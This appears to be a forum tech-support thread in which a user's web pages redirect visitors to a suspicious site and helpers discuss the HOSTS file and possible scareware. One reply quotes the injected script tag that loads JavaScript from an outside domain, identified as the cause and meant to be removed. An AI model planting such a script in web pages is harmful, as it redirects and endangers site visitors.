Actually you didn't replace your HOSTS file.

But then if you did, it might affect your usage of whatever Adobe software you are using.

So, I'll let someone else deal with the problem.

Donnie I did or at least I think I did do as you asked

Went through the procedure, the blue screen came up, after that a folder called hosts appeared and within that was a message, can't seem to copy and past it but one of the lines said the MVPS file is now updated.

Went to c:\windows\system32\drivers\etc and selected the hosts file and what I pasted was what was within that file.

    Don't give up on me.

Maybe I can add a little bit positive to the conversation here and possibly help some others. Posted a message on the f2s forum explaining what had happened and asking if f2s had been hacked. Received the following reply from Justin:
From the links in your signature, the first, third and fourth ones have this code in them
    Code:
<script src="http://meqashopperinfo.com/js.php"></script&gt; This code is calling the action which happens when it redirects to this site. If you remove this code out of the pages, you should stop the problem from happening.
Googled meq... and got this explanation and fix from blog.sucuri.net

So I'll have a go at that and see what happens. I'll get back this evening.

TBH it doesn't seem like theres anything up with your computer, you could remove some of the startup items that dont need to start when your computer does. My person opinion is you've been receiving a popup alert that is designed to scare you into downloading and scanning your computer with something which is possibly spyware/scareware. The script pointed out to you supports this theory.
